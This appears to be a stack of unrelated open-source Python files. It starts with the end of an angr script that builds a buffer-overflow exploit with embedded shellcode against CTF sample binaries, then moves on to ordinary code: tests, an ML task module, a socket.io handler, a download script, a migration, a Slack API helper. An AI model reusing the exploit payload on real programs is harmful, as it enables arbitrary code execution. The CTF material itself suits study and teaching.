#Generate a SimulationManager out of this state and explore
sm = p.factory.simulation_manager(e)
sm.explore(find=t,avoid=to_avoid)
#Save the solutions
found = sm.found[0]
address_local = byte_addresses[i]
byte_map[address_local[3]] = found.solver.eval(rdi)
byte_map[address_local[2]] = found.solver.eval(rsi)
byte_map[address_local[1]] = found.solver.eval(rdx)
byte_map[address_local[0]] = found.solver.eval(rcx)
return byte_map
def format_input(byte_map):
res = ''
for i in range(min(byte_map), max(byte_map) + 1):
res += "%02x" % byte_map[i]
return res
def generate_exploit(byte_string):
print('[*] Crafting final exploit')
#In essence, the magic consists of:
# - static padding between input and the memcpy'ed buffer
# - padding from start of this buffer up to the location of the saved return address
# - the address of the shellcode
# - customized shellcode for '/bin/sh -c "echo SUCCESS"'
#For more details of the magic, please check the writeup linked above
magic = '424242424242424242424141414141414141414141414141414141414141414141412e626000000000006563686f20275355434345535327004141414141414141414141414141414141414141414141414141414141414141412f62696e2f7368002d630000000000004831c050b8ee61600050b82662600050b81e626000504889e64889c74831d2b83b0000000f05'
exploit = byte_string + magic
return exploit
def main(binary):
p = angr.Project(binary, auto_load_libs=True)
(to_find, to_avoid, byte_addresses) = static_analyses(p)
byte_map = generate_input(p, to_find, to_avoid, byte_addresses)
exploit = generate_exploit(format_input(byte_map))
print('[+] Exploit generated!')
print('[!] Please run `%s %s`' % (binary,exploit))
return exploit
def test():
binaries = ['./sample_1','./sample_2','./sample_3','./sample_4']
for b in binaries:
p = main(b)
assert subprocess.check_output([b,p]) == b'SUCCESS\n'
if __name__ == '__main__':
main(sys.argv[1])
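# Example invocation (sketch; sample_1 is one of the four bundled CTF binaries):
#   python solve.py ./sample_1
# main() prints the crafted exploit string, which test() feeds back into the
# binary and checks for the expected "SUCCESS" output.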
|
3d9c1a4d08525e2d29ca41e481c6f316e16cb9ce
|
e65a4dbfbfb0e54e59787ba7741efee12f7687f3
|
/hebrew/py-pyluach/files/test.py
|
d234c73a2cee9bc949602ebd17076287ed9934c9
|
[
"BSD-2-Clause"
] |
permissive
|
freebsd/freebsd-ports
|
86f2e89d43913412c4f6b2be3e255bc0945eac12
|
605a2983f245ac63f5420e023e7dce56898ad801
|
refs/heads/main
| 2023-08-30T21:46:28.720924
| 2023-08-30T19:33:44
| 2023-08-30T19:33:44
| 1,803,961
| 916
| 918
|
NOASSERTION
| 2023-09-08T04:06:26
| 2011-05-26T11:15:35
| null |
UTF-8
|
Python
| false
| false
| 762
|
py
|
test.py
|
from pyluach import dates, hebrewcal, parshios
today = dates.HebrewDate.today()
lastweek_gregorian = (today - 7).to_greg()
print(f"lastweek_gregorian<today: ={lastweek_gregorian < today}")
print(f"today-lastweek_gregorian={today - lastweek_gregorian}")
greg = dates.GregorianDate(1986, 3, 21)
heb = dates.HebrewDate(5746, 13, 10)
print(f"greg==heb: {greg == heb}")
purim = dates.HebrewDate(5781, 12, 14)
print(f"purim.hebrew_day()={purim.hebrew_day()}")
print(f"purim.hebrew_date_string()={purim.hebrew_date_string()}")
print(f"purim.hebrew_date_string(True)={purim.hebrew_date_string(True)}")
rosh_hashana = dates.HebrewDate(5782, 7, 1)
print(f"rosh_hashana.holiday={rosh_hashana.holiday()}")
print(f"rosh_hashana.holiday={rosh_hashana.holiday(hebrew=True)}")
|
1d06aa89a92d4ca297b0544b0e240ed230d3a134
|
cadb6dceb7bb67ce47ef48b2c83f480a65d6b01a
|
/s3prl/task/scene_prediction.py
|
5e125ead71c0d46e6079060c6bd74029c2e2ff3a
|
[
"Apache-2.0",
"CC-BY-NC-4.0"
] |
permissive
|
s3prl/s3prl
|
52ec2ae4df5a61c786c122085603aa9c5e8c2681
|
76a9432b824f6ae3eae09a35a67782c4ed582832
|
refs/heads/main
| 2023-08-17T02:26:57.524087
| 2023-06-10T17:12:27
| 2023-06-10T17:12:27
| 196,905,457
| 1,549
| 398
|
Apache-2.0
| 2023-09-14T13:07:05
| 2019-07-15T01:54:52
|
Python
|
UTF-8
|
Python
| false
| false
| 4,463
|
py
|
scene_prediction.py
|
# Copyright Hear Benchmark Team
# Copyright Shu-wen Yang (refactor from https://github.com/hearbenchmark/hear-eval-kit)
from typing import List
import torch
from s3prl.dataio.encoder.category import CategoryEncoder
from s3prl.task.base import Task
from ._hear_score import available_scores, validate_score_return_type
__all__ = ["ScenePredictionTask"]
class OneHotToCrossEntropyLoss(torch.nn.Module):
def __init__(self):
super().__init__()
self.loss = torch.nn.CrossEntropyLoss()
def forward(self, y_hat: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
assert torch.all(torch.sum(y, dim=1) == y.new_ones(y.shape[0]))
y = y.argmax(dim=1)
return self.loss(y_hat, y)
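# Illustrative sketch (added): OneHotToCrossEntropyLoss expects strictly one-hot
# float targets and reduces them to class indices before applying
# torch.nn.CrossEntropyLoss, e.g.:
#     loss_fn = OneHotToCrossEntropyLoss()
#     logits = torch.randn(4, 10)  # (batch_size, num_class)
#     target = torch.nn.functional.one_hot(
#         torch.randint(0, 10, (4,)), num_classes=10
#     ).float()
#     loss = loss_fn(logits, target)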
class ScenePredictionTask(Task):
def __init__(
self,
model: torch.nn.Module,
category: CategoryEncoder,
prediction_type: str,
scores: List[str],
):
super().__init__()
self.model = model
self.label_to_idx = {
str(category.decode(idx)): idx for idx in range(len(category))
}
self.idx_to_label = {
idx: str(category.decode(idx)) for idx in range(len(category))
}
self.scores = [
available_scores[score](label_to_idx=self.label_to_idx) for score in scores
]
if prediction_type == "multilabel":
self.activation: torch.nn.Module = torch.nn.Sigmoid()
self.logit_loss = torch.nn.BCEWithLogitsLoss()
elif prediction_type == "multiclass":
self.activation = torch.nn.Softmax(dim=-1)
self.logit_loss = OneHotToCrossEntropyLoss()
else:
raise ValueError(f"Unknown prediction_type {prediction_type}")
def predict(self, x, x_len):
logits, _ = self.model(x, x_len)
prediction = self.activation(logits)
return prediction, logits
def forward(
self, _mode: str, x, x_len, y, labels, unique_name: str, _dump_dir: str = None
):
y_pr, y_hat = self.predict(x, x_len)
loss = self.logit_loss(y_hat.float(), y.float())
cacheable = dict(
loss=loss.detach().cpu().item(),
label=y.detach().cpu().unbind(dim=0), # (batch_size, num_class)
logit=y_hat.detach().cpu().unbind(dim=0), # (batch_size, num_class)
prediction=y_pr.detach().cpu().unbind(dim=0), # (batch_size, num_class)
)
return loss, cacheable
def log_scores(self, score_args):
"""Logs the metric score value for each score defined for the model"""
assert hasattr(self, "scores"), "Scores for the model should be defined"
end_scores = {}
        # The first score in `self.scores` is the optimization criterion
for score in self.scores:
score_ret = score(*score_args)
validate_score_return_type(score_ret)
            # If the returned score is a tuple, store each subscore as a separate entry
if isinstance(score_ret, tuple):
end_scores[f"{score}"] = score_ret[0][1]
# All other scores will also be logged
for (subscore, value) in score_ret:
end_scores[f"{score}_{subscore}"] = value
elif isinstance(score_ret, float):
end_scores[f"{score}"] = score_ret
else:
raise ValueError(
f"Return type {type(score_ret)} is unexpected. Return type of "
"the score function should either be a "
"tuple(tuple) or float."
)
return end_scores
def reduction(
self,
_mode: str,
cached_results: List[dict],
_dump_dir: str = None,
):
result = self.parse_cached_results(cached_results)
target = torch.stack(result["label"], dim=0)
prediction_logit = torch.stack(result["logit"], dim=0)
prediction = torch.stack(result["prediction"], dim=0)
loss = self.logit_loss(prediction_logit, target)
logs = dict(
loss=loss.detach().cpu().item(),
)
if _mode in ["valid", "test"]:
logs.update(
self.log_scores(
score_args=(
prediction.detach().cpu().numpy(),
target.detach().cpu().numpy(),
),
)
)
return logs
|
64c15ad15c51d9482ce54828aa94c49794c68933
|
dbd1399c4e8d01e02f4f94de7b1bbdb123838c0c
|
/tests/test_tags.py
|
a877b2265e9bad4b3e62a84a9227d366e242163c
|
[
"Apache-2.0",
"GPL-1.0-or-later"
] |
permissive
|
xhtml2pdf/xhtml2pdf
|
fe4416904bf2cedcce5af67b413152545c7d2499
|
f5bd8520699a2742aa2d960826b19d9594864fe0
|
refs/heads/master
| 2023-08-09T23:27:01.613275
| 2023-07-24T12:19:19
| 2023-07-24T12:19:19
| 1,755,413
| 1,218
| 398
|
Apache-2.0
| 2023-07-24T12:19:20
| 2011-05-16T13:45:29
|
Python
|
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
test_tags.py
|
from unittest import TestCase
from xml.dom import minidom
from xhtml2pdf import tags
from xhtml2pdf.context import pisaContext
from xhtml2pdf.parser import AttrContainer, pisaGetAttributes
class PisaTagTestCase(TestCase):
def test_pisa_tag_will_set_attrs_on_init(self):
dom = minidom.parseString("<unit>test</unit>")
element = dom.getElementsByTagName("unit")[0]
attrs = AttrContainer({})
instance = tags.pisaTag(element, attrs)
self.assertEqual(instance.node, element)
self.assertEqual(instance.tag, "unit")
self.assertEqual(instance.attr, {})
class PisaTagOLTestCase(TestCase):
def test_pisa_ol_tag_start_attr(self):
dom = minidom.parseString('<ol start="10"><li>item</li></ol>')
element = dom.getElementsByTagName("ol")[0]
context = pisaContext([])
attrs = pisaGetAttributes(context, element.tagName.lower(), element.attributes)
instance = tags.pisaTagOL(element, attrs)
instance.start(context)
self.assertEqual(instance.node, element)
self.assertEqual(context.listCounter, 9)
|
417b3b6e7df04710fa16fcb4ef8776bb15bb742f
|
df4679cc6ef97f3af38e01a712c84b59cd6056e2
|
/appdaemon/stream/socketio_handler.py
|
0d970592d99e2672954eb7d4b6defbef419a9a19
|
[
"Apache-2.0"
] |
permissive
|
AppDaemon/appdaemon
|
60041128fa59c7cdf257b5603590a75602be19d4
|
02a45c36c0e4d22ae14e630e7e747406fad4b753
|
refs/heads/dev
| 2023-09-04T06:15:53.938410
| 2023-06-28T13:23:20
| 2023-06-28T13:23:20
| 63,267,110
| 319
| 155
|
NOASSERTION
| 2023-07-20T16:09:46
| 2016-07-13T17:43:46
|
Python
|
UTF-8
|
Python
| false
| false
| 3,634
|
py
|
socketio_handler.py
|
import socketio
import json
import traceback
import appdaemon.utils as utils
class SocketIOHandler:
def __init__(self, ADStream, app, path, ad):
self.AD = ad
self.ADStream = ADStream
self.app = app
self.path = path
self.logger = ad.logging.get_child("_stream")
self.access = ad.logging.get_access()
self.sio = socketio.AsyncServer(async_mode="aiohttp")
self.ns = NameSpace(self.ADStream, self.path, self.AD)
self.sio.register_namespace(self.ns)
self.sio.attach(self.app)
def makeStream(self, ad, request, **kwargs):
return SocketIOStream(ad, self.ns, request)
class NameSpace(socketio.AsyncNamespace):
def __init__(self, ADStream, path, AD):
super().__init__(path)
self.AD = AD
self.logger = AD.logging.get_child("_stream")
self.access = AD.logging.get_access()
self.ADStream = ADStream
async def on_down(self, sid, data):
self.logger.debug("IOSocket Down sid={} data={}".format(sid, data))
try:
msg = json.loads(data)
handler = self.ADStream.get_handler(sid)
await handler._on_message(msg)
except TypeError as e:
self.logger.debug("-" * 60)
self.logger.warning("Unexpected error in JSON conversion when reading from stream")
self.logger.debug("Data is: %s", data)
self.logger.debug("Error is: %s", e)
self.logger.debug("-" * 60)
except Exception:
self.logger.debug("-" * 60)
self.logger.debug("Client disconnected unexpectedly")
self.access.info("Client disconnected unexpectedly")
self.logger.debug("-" * 60)
self.logger.debug(traceback.format_exc())
self.logger.debug("-" * 60)
async def on_connect(self, sid, environ):
self.logger.debug("IOSocket Connect sid={} env={}".format(sid, environ))
await self.ADStream.on_connect({"sid": sid, "environ": environ})
async def on_disconnect(self, sid):
self.logger.debug("IOSocket disconnect sid={}".format(sid))
handler = self.ADStream.get_handler(sid)
await handler._on_disconnect()
class SocketIOStream:
def __init__(self, ad, namespace, request):
self.ns = namespace
self.client_id = request["sid"]
self.logger = ad.logging.get_child("_stream")
self.access = ad.logging.get_access()
self.client_name = None
def set_client_name(self, client_name):
self.client_name = client_name
async def run(self):
pass
async def sendclient(self, data):
self.logger.debug("IOSocket Send sid={} data={}".format(self.client_id, data))
data["client_id"] = self.client_id
try:
msg = utils.convert_json(data)
await self.ns.emit("up", msg, room=self.client_id)
except TypeError as e:
self.logger.debug("-" * 60)
self.logger.warning("Unexpected error in JSON conversion when writing to stream from %s", self.client_name)
self.logger.debug("Data is: %s", data)
self.logger.debug("Error is: %s", e)
self.logger.debug("-" * 60)
except Exception:
self.logger.debug("-" * 60)
self.logger.debug("Client disconnected unexpectedly from %s", self.client_name)
self.access.info("Client disconnected unexpectedly from %s", self.client_name)
self.logger.debug("-" * 60)
self.logger.debug(traceback.format_exc())
self.logger.debug("-" * 60)
|
9a11b1660128aec0ce51919fceb67bd9df3c0a1b
|
87597df3a60b0fc985b43d7a64cafa58ac9de339
|
/kubric/scripts/download_hdri_haven.py
|
112f035b371a3b9ddad59de2630e16032b74054e
|
[
"Apache-2.0"
] |
permissive
|
google-research/kubric
|
f139e72891c30d4330ab4e195b7fbe3b0f649a81
|
bb534357a0e3a316979bfc35900279737b3cbf26
|
refs/heads/main
| 2023-09-04T09:53:33.144226
| 2023-08-16T23:07:32
| 2023-08-16T23:07:32
| 281,770,989
| 1,947
| 183
|
Apache-2.0
| 2023-09-13T04:31:51
| 2020-07-22T19:56:38
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,418
|
py
|
download_hdri_haven.py
|
# Copyright 2023 The Kubric Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import copy
import functools
import logging
import multiprocessing
import pathlib
import shutil
import tarfile
import urllib.error
import urllib.parse
import urllib.request
import requests
import tqdm
from kubric import file_io
from kubric.kubric_typing import PathLike
def collect_list_of_available_assets(
catalogue_path="hdri_haven_catalogue.json"):
catalogue_path = file_io.as_path(catalogue_path)
if catalogue_path.exists():
return file_io.read_json(catalogue_path)
# Get a list of available assets
response = requests.get("https://api.polyhaven.com/assets?t=hdris")
catalogue = [
{"id": k,
"asset_type": "Texture",
"license": "CC0 1.0",
"url": "https://dl.polyhaven.org/file/ph-assets/HDRIs/hdr/4k/{name}_4k.hdr".format(
name=urllib.request.quote(k)),
"kwargs": {
},
"metadata": {
"authors": list(v["authors"].keys()),
"resolution": "4k",
"coords": v.get("coords"),
"date_taken": v["date_taken"],
"tags": v["tags"],
"categories": v["categories"],
},
} for k, v in response.json().items()]
file_io.write_json(catalogue, catalogue_path)
return catalogue
def download_asset(a, download_dir):
filename = pathlib.Path(urllib.parse.urlparse(a["url"]).path).name
download_dir = pathlib.Path(download_dir)
target_path = download_dir / filename
if not target_path.exists():
try:
opener = urllib.request.URLopener()
opener.addheader('User-Agent', 'Mozilla/5.0')
opener.retrieve(a["url"], target_path)
except (urllib.error.HTTPError, urllib.error.URLError) as e:
      logging.warning("Download failed; skipping '%s': %s", a["id"], e)
def download_all(assets_list, num_processes=16, download_dir='GSO_raw'):
download_dir = pathlib.Path(download_dir)
download_dir.mkdir(parents=True, exist_ok=True)
download_func = functools.partial(download_asset, download_dir=download_dir)
with tqdm.tqdm(total=len(assets_list)) as pbar:
with multiprocessing.Pool(num_processes, maxtasksperchild=1) as pool:
promise = pool.imap_unordered(download_func, assets_list)
for _ in promise:
pbar.update(1)
def kubricify(asset, source_dir, target_dir):
name = asset["id"]
source_dir = file_io.as_path(source_dir)
target_dir = file_io.as_path(target_dir)
hdri_source_path = source_dir / f"{name}_4k.hdr"
tmp_dir = target_dir / name
if tmp_dir.exists():
shutil.rmtree(tmp_dir)
tmp_dir.mkdir(parents=True, exist_ok=False)
json_path = tmp_dir / "data.json"
tar_path = target_dir / f"{name}.tar.gz"
if tar_path.exists():
with tarfile.open(tar_path, "r:gz") as tar:
tar.extract("data.json", tmp_dir)
asset_entry = file_io.read_json(json_path)
if asset_entry and "id" in asset_entry:
shutil.rmtree(tmp_dir)
return asset_entry["id"], asset_entry
asset_entry = copy.deepcopy(asset)
del asset_entry["url"]
asset_entry["kwargs"]["filename"] = "environment_4k.hdr"
file_io.write_json(asset_entry, json_path)
with tarfile.open(tar_path, "w:gz") as tar:
tar.add(hdri_source_path, asset_entry["kwargs"]["filename"])
tar.add(json_path, "data.json")
shutil.rmtree(tmp_dir)
return name, asset_entry
def main(
download_dir: PathLike = "GSO_raw",
target_dir: PathLike = "GSO",
keep_raw_assets=False
):
download_dir = file_io.as_path(download_dir)
target_dir = file_io.as_path(target_dir)
catalogue = collect_list_of_available_assets()
download_all(catalogue, download_dir=download_dir)
assets = {}
with tqdm.tqdm(total=len(catalogue)) as pbar:
with multiprocessing.Pool(32, maxtasksperchild=1) as pool:
promise = pool.imap_unordered(functools.partial(kubricify,
source_dir=download_dir,
target_dir=target_dir),
catalogue)
for name, entry in promise:
assets[name] = entry
pbar.update(1)
manifest_path = "HDRI_haven.json"
manifest = {
"name": "HDRI_haven",
"data_dir": str(target_dir),
"version": "1.0",
"assets": assets
}
file_io.write_json(manifest, manifest_path)
if not keep_raw_assets:
logging.info("Deleting the raw (unconverted) assets...")
shutil.rmtree(download_dir)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--download_dir", type=str, default="HDRI_haven_raw")
parser.add_argument("--target_dir", type=str, default="HDRI_haven")
parser.add_argument("--keep_raw_assets", type=bool, default=False)
FLAGS, unused = parser.parse_known_args()
main(download_dir=FLAGS.download_dir, target_dir=FLAGS.target_dir,
keep_raw_assets=FLAGS.keep_raw_assets)
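# Example invocation (sketch; directory names are the argparse defaults above):
#   python download_hdri_haven.py --download_dir HDRI_haven_raw --target_dir HDRI_haven
# This fetches the 4k HDRIs listed by the Poly Haven API, repacks each one into
# <name>.tar.gz alongside a data.json entry, and writes an HDRI_haven.json manifest.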
|
4c6c309e2d729e3d5a5f15524bb43b63ce44f704
|
abe6c00f9790df7e6ef20dc02d0b1b225b5020cb
|
/src/prefect/server/database/migrations/versions/sqlite/2022_10_19_155810_af52717cf201_track_retries_restarts.py
|
ca6a58aa802522f4c17add1cd903bdf5676d0961
|
[
"Apache-2.0"
] |
permissive
|
PrefectHQ/prefect
|
000e6c5f7df80f76a181f0a30f8661c96417c8bd
|
2c50d2b64c811c364cbc5faa2b5c80a742572090
|
refs/heads/main
| 2023-09-05T20:25:42.965208
| 2023-09-05T18:58:06
| 2023-09-05T18:58:06
| 139,199,684
| 12,917
| 1,539
|
Apache-2.0
| 2023-09-14T20:25:45
| 2018-06-29T21:59:26
|
Python
|
UTF-8
|
Python
| false
| false
| 771
|
py
|
2022_10_19_155810_af52717cf201_track_retries_restarts.py
|
"""Add retry and restart metadata
Revision ID: af52717cf201
Revises: ad4b1b4d1e9d
Create Date: 2022-10-19 15:58:10.016251
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "af52717cf201"
down_revision = "3ced59d8806b"
branch_labels = None
depends_on = None
def upgrade():
with op.batch_alter_table("task_run", schema=None) as batch_op:
batch_op.add_column(
sa.Column(
"flow_run_run_count", sa.Integer(), server_default="0", nullable=False
)
)
# ### end Alembic commands ###
def downgrade():
with op.batch_alter_table("task_run", schema=None) as batch_op:
batch_op.drop_column("flow_run_run_count")
# ### end Alembic commands ###
|
818c43e24a4782428bda8d02fe115827887757f4
|
e1cddfd754d952134e72dfd03522c5ea4fb6008e
|
/test/asf/test_bihash.py
|
24639bd7a3b15707430c579e43963e3f8390ccf0
|
[
"Apache-2.0"
] |
permissive
|
FDio/vpp
|
0ad30fa1bec2975ffa6b66b45c9f4f32163123b6
|
f234b0d4626d7e686422cc9dfd25958584f4931e
|
refs/heads/master
| 2023-08-31T16:09:04.068646
| 2022-03-14T09:49:15
| 2023-08-31T09:50:00
| 96,556,718
| 1,048
| 630
|
Apache-2.0
| 2023-06-21T05:39:17
| 2017-07-07T16:29:40
|
C
|
UTF-8
|
Python
| false
| false
| 2,201
|
py
|
test_bihash.py
|
#!/usr/bin/env python3
import unittest
from config import config
from asfframework import VppTestCase, VppTestRunner
from vpp_ip_route import VppIpTable, VppIpRoute, VppRoutePath
class TestBihash(VppTestCase):
"""Bihash Test Cases"""
@classmethod
def setUpClass(cls):
# increase vapi timeout, to avoid spurious "test bihash ..."
# failures reported on aarch64 w/ test-debug
cls.vapi_response_timeout = 20
super(TestBihash, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(TestBihash, cls).tearDownClass()
def setUp(self):
super(TestBihash, self).setUp()
def tearDown(self):
super(TestBihash, self).tearDown()
def test_bihash_unittest(self):
"""Bihash Add/Del Test"""
error = self.vapi.cli("test bihash careful 0 verbose 0")
if error:
self.logger.critical(error)
self.assertNotIn("failed", error)
def test_bihash_thread(self):
"""Bihash Thread Test"""
error = self.vapi.cli(
"test bihash threads 2 nbuckets" + " 64000 careful 0 verbose 0"
)
if error:
self.logger.critical(error)
self.assertNotIn("failed", error)
def test_bihash_vec64(self):
"""Bihash vec64 Test"""
error = self.vapi.cli("test bihash vec64")
if error:
self.logger.critical(error)
self.assertNotIn("failed", error)
@unittest.skipUnless(config.gcov, "part of code coverage tests")
def test_bihash_coverage(self):
"""Improve Code Coverage"""
        error = self.vapi.cli(
            "test bihash nitems 10 ncycles 3 "
            + "search 2 careful 1 verbose 2 non-random-keys"
        )
if error:
self.logger.critical(error)
self.assertNotIn("failed", error)
        error = self.vapi.cli(
            "test bihash nitems 10 nbuckets 1 ncycles 3 "
            + "search 2 careful 1 verbose 2 non-random-keys"
        )
if error:
self.logger.critical(error)
self.assertNotIn("failed", error)
if __name__ == "__main__":
unittest.main(testRunner=VppTestRunner)
|
64d274be1febe1c9b10fe0b80a2d3c2d43ed1608
|
2ae0b8d95d439ccfd55ea7933ad4a2994ad0f6c5
|
/tests/layer_tests/pytorch_tests/test_stack.py
|
670033c7b294c198d4317e100ea0c045f2d9033f
|
[
"Apache-2.0"
] |
permissive
|
openvinotoolkit/openvino
|
38ea745a247887a4e14580dbc9fc68005e2149f9
|
e4bed7a31c9f00d8afbfcabee3f64f55496ae56a
|
refs/heads/master
| 2023-08-18T03:47:44.572979
| 2023-08-17T21:24:59
| 2023-08-17T21:24:59
| 153,097,643
| 3,953
| 1,492
|
Apache-2.0
| 2023-09-14T21:42:24
| 2018-10-15T10:54:40
|
C++
|
UTF-8
|
Python
| false
| false
| 2,423
|
py
|
test_stack.py
|
# Copyright (C) 2018-2023 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import numpy as np
import pytest
from pytorch_layer_test_class import PytorchLayerTest
class TestStack2D(PytorchLayerTest):
def _prepare_input(self):
return self.input_tensors
def create_model(self, dim):
import torch
class aten_stack(torch.nn.Module):
def __init__(self, dim):
super(aten_stack, self).__init__()
self.dim = dim
def forward(self, x, y):
inputs = [x, y]
return torch.stack(inputs, self.dim)
ref_net = None
return aten_stack(dim), ref_net, "aten::stack"
@pytest.mark.parametrize("input_tensor", ([
[np.random.rand(1, 3, 3), np.random.rand(1, 3, 3)],
[np.random.rand(4, 4, 2), np.random.rand(4, 4, 2)],
[np.random.rand(8, 1, 1, 9), np.random.rand(8, 1, 1, 9)]
]))
@pytest.mark.parametrize("dim", ([
0, 1, 2,
]))
@pytest.mark.nightly
@pytest.mark.precommit
def test_stack2D(self, input_tensor, dim, ie_device, precision, ir_version):
self.input_tensors = input_tensor
self._test(*self.create_model(dim), ie_device, precision, ir_version)
class TestStack3D(PytorchLayerTest):
def _prepare_input(self):
return self.input_tensors
def create_model(self, dim):
import torch
class aten_stack(torch.nn.Module):
def __init__(self, dim):
super(aten_stack, self).__init__()
self.dim = dim
def forward(self, x, y, z):
inputs = [x, y, z]
return torch.stack(inputs, self.dim)
ref_net = None
return aten_stack(dim), ref_net, "aten::stack"
@pytest.mark.parametrize("input_tensor", ([
[np.random.rand(1, 3, 3), np.random.rand(1, 3, 3), np.random.rand(1, 3, 3)],
[np.random.rand(4, 4, 2), np.random.rand(4, 4, 2), np.random.rand(4, 4, 2)],
[np.random.rand(8, 1, 1, 9), np.random.rand(8, 1, 1, 9), np.random.rand(8, 1, 1, 9)]
]))
@pytest.mark.parametrize("dim", ([
0, 1, 2,
]))
@pytest.mark.nightly
@pytest.mark.precommit
def test_stack3D(self, input_tensor, dim, ie_device, precision, ir_version):
self.input_tensors = input_tensor
self._test(*self.create_model(dim), ie_device, precision, ir_version)
|
627bb11be9d78307e71d667177cf9c32bafe2d17
|
a702fb476539272b78328f64a3a49c1012ac3ed4
|
/django_slack/api.py
|
2a3997f7cd8a6dbe24f855cef316b7e90a915e13
|
[
"BSD-3-Clause"
] |
permissive
|
lamby/django-slack
|
7f8dea40e5b3cad93f2e207b2815327993743774
|
5b92410fadc1a91b9415c0991f0ff2547cd633c7
|
refs/heads/master
| 2023-03-10T23:54:17.789584
| 2023-03-02T08:07:43
| 2023-03-02T08:07:43
| 27,838,503
| 250
| 88
|
BSD-3-Clause
| 2023-03-01T15:08:41
| 2014-12-10T20:34:18
|
Python
|
UTF-8
|
Python
| false
| false
| 5,595
|
py
|
api.py
|
import json
from django.conf import settings
from django.utils.encoding import force_str
from django.template.loader import render_to_string
from .utils import get_backend
from .app_settings import app_settings
def slack_message(
template,
context=None,
attachments=None,
blocks=None,
fail_silently=None,
**kwargs,
):
data = {}
channel = kwargs.pop('channel', app_settings.CHANNEL)
backend = get_backend(name=kwargs.pop('backend', None))
unfurl_links = kwargs.pop('unfurl_links', True)
unfurl_media = kwargs.pop('unfurl_media', True)
link_names = kwargs.pop('link_names', False)
thread_ts = kwargs.pop('thread_ts', None)
context = dict(context or {}, settings=settings)
if fail_silently is None:
fail_silently = app_settings.FAIL_SILENTLY
NOT_REQUIRED, DEFAULT_ENDPOINT, ALWAYS = range(3)
PARAMS = {
'text': {'default': '', 'required': NOT_REQUIRED,}, # Checked later
'token': {
'default': app_settings.TOKEN,
'required': DEFAULT_ENDPOINT,
},
'channel': {'default': channel, 'required': DEFAULT_ENDPOINT,},
'icon_url': {
'default': app_settings.ICON_URL,
'required': NOT_REQUIRED,
},
'icon_emoji': {
'default': app_settings.ICON_EMOJI,
'required': NOT_REQUIRED,
},
'username': {
'default': app_settings.USERNAME,
'required': NOT_REQUIRED,
},
'attachments': {
'default': attachments,
'render': False,
'required': NOT_REQUIRED,
},
'blocks': {
'default': blocks,
'render': False,
'required': NOT_REQUIRED,
},
'endpoint_url': {
'default': app_settings.ENDPOINT_URL,
'render': ALWAYS,
'required': NOT_REQUIRED,
},
'as_user': {
'default': app_settings.AS_USER,
'render': False,
'required': NOT_REQUIRED,
},
'unfurl_links': {
'default': unfurl_links,
'render': False,
'required': NOT_REQUIRED,
},
'unfurl_media': {
'default': unfurl_media,
'render': False,
'required': NOT_REQUIRED,
},
'link_names': {
'default': link_names,
'render': False,
'required': NOT_REQUIRED,
},
'thread_ts': {
'default': thread_ts,
'render': False,
'required': NOT_REQUIRED,
},
}
for k, v in PARAMS.items():
# First, set from default if we have one (i.e. it is truthy,
# or, for boolean values, the value is explicitly set to False).
# We do this so blocks are set properly to null when text is
# set, but if unfurl_links or unfurl_media is False, they are
# still passed to the endpoint as parameters
if v['default'] or v['default'] is False:
data[k] = v['default']
# Render template if necessary
if v.get('render', True):
try:
val = force_str(
render_to_string(
template,
dict(
context, django_slack='django_slack/{}'.format(k),
),
).strip()
)
except Exception:
if fail_silently:
return
raise
if val:
data[k] = val
        # Check if the parameter is required
if v['required'] == ALWAYS:
if data.get(k, None):
continue
if fail_silently:
return
raise ValueError(
"Missing or empty required parameter: {}".format(k)
)
if 'text' not in data and 'attachments' not in data:
raise ValueError(
"text parameter is required if attachments is not set",
)
# Ensure that as_user is either "true" or not present (rather than "True"
# or "False", etc.).
#
# This also prevents an encoding error under (just) Django 2.1 due to an
# upstream regression (<https://github.com/lamby/django-slack/issues/85>).
#
if data.pop('as_user', app_settings.AS_USER):
data['as_user'] = 'true'
# The endpoint URL is not part of the data payload but as we construct it
# within `data` we must remove it.
endpoint_url = data.pop('endpoint_url')
# If a custom endpoint URL was specified then we need to wrap it, otherwise
# we need to ensure attachments are encoded.
if endpoint_url == app_settings.DEFAULT_ENDPOINT_URL:
# Check parameters that are only required if we don't specify a custom
# endpoint URL.
for k, v in PARAMS.items():
if v['required'] != DEFAULT_ENDPOINT:
continue
if not data.get(k, None):
if fail_silently:
return
raise ValueError(
"{} parameter is required if custom endpoint URL is not "
"specified".format(k),
)
for x in ('attachments', 'blocks'):
if x in data:
data[x] = json.dumps(data[x])
else:
data = {'payload': json.dumps(data)}
try:
return backend.send(endpoint_url, data, **kwargs)
except Exception:
if not fail_silently:
raise
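# Hedged usage sketch (added; the template path and context key below are
# hypothetical, and the package-level import is assumed rather than shown in
# this file - only the keyword arguments are taken from the code above):
#     from django_slack import slack_message
#     slack_message('slack/new_signup.slack', {'user': user},
#                   channel='#signups', fail_silently=True)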
|
fa86121089319c2401973498a35e5957cbe922f0
|
8e6203db7383475f1c24a590f0456330b969bb4b
|
/optbinning/binning/multidimensional/mip_2d.py
|
e3113275f0291d87407cf6e39fe8197087f4bbcd
|
[
"Apache-2.0"
] |
permissive
|
guillermo-navas-palencia/optbinning
|
6fdfc764a214052b4d7d8e0b59114f0a63e6d5a8
|
73aee82008ebe88b732430e7c5764da57fb4d3ae
|
refs/heads/master
| 2023-08-28T13:33:43.536143
| 2023-08-22T19:20:18
| 2023-08-22T19:20:18
| 231,076,826
| 377
| 91
|
Apache-2.0
| 2023-09-05T20:14:14
| 2019-12-31T11:17:44
|
Python
|
UTF-8
|
Python
| false
| false
| 7,663
|
py
|
mip_2d.py
|
"""
Generalized assignment problem: solve the constrained optimal 2D binning problem.
Mixed-Integer programming implementation.
"""
# Guillermo Navas-Palencia <g.navas.palencia@gmail.com>
# Copyright (C) 2021
import numpy as np
from ortools.linear_solver import pywraplp
class Binning2DMIP:
